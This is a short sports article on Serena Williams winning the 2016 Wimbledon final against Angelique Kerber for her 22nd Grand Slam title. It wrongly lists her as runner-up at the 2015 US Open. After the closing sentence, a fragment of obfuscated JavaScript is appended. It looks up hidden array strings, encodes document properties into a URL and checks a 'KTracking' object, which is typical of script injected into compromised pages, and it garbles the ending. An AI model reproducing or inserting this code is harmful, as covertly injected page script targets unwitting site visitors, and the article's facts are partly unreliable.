Serena Williams created history at the centre court in Wimbledon beating the German Angelique Kerber 7-5, 6-3 in straight sets successfully defending her Wimbledon title.

It was a day of records in the Women’s singles final at Wimbledon. Serena Williams won her 22nd Grand Slam title equaling Steffi Graf’s record. This was Serena’s first title since Wimbledon last year. She was runner-up in the US open 2015, followed by the Australian Open 2016 and the French Open 2016. The long wait for title no 22 was finally over but it wasn’t a cake walk.

Both players started brightly with the match being on serve till 6-5 in the first set. That was the time Serena capitalized an opening and was quick to pounce on the errors from Kerber sealing the first set 7-5. This match was far from over and we saw some magnificent tennis in the second. Some of the rallies captivated the crowd with both players running tirelessly chasing lost causes. It wasn’t until Kerber’s serve at 3-4 when Serena produced a resolute display to break the German. 5-3 and Serena serving for the Championship made no mistake hitting two powerful aces eventually winning her 22nd Grand Slam title 7-5,6-3.

It was heart-break for Kerber who was looking to become the first German player to win a Wimbledon title since 1996. With the Australian Open 2016 being her first Grand Slam title in her career, Angelique was eyeing her second title.

Serena Williams became the oldest player to ever win a Grand Slam title at 34 years 286 days. She now is chasing the all time Grand Slam record of 24 titles set by the Australian Margaret Court. The crowd cheered in full unison for the American who had demonstrated why she is the best women’s tennis player in history. Congratulations Serena Williams on the winning Wimbledon 2016 title, the sport of tennis will forever be grateful! )}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
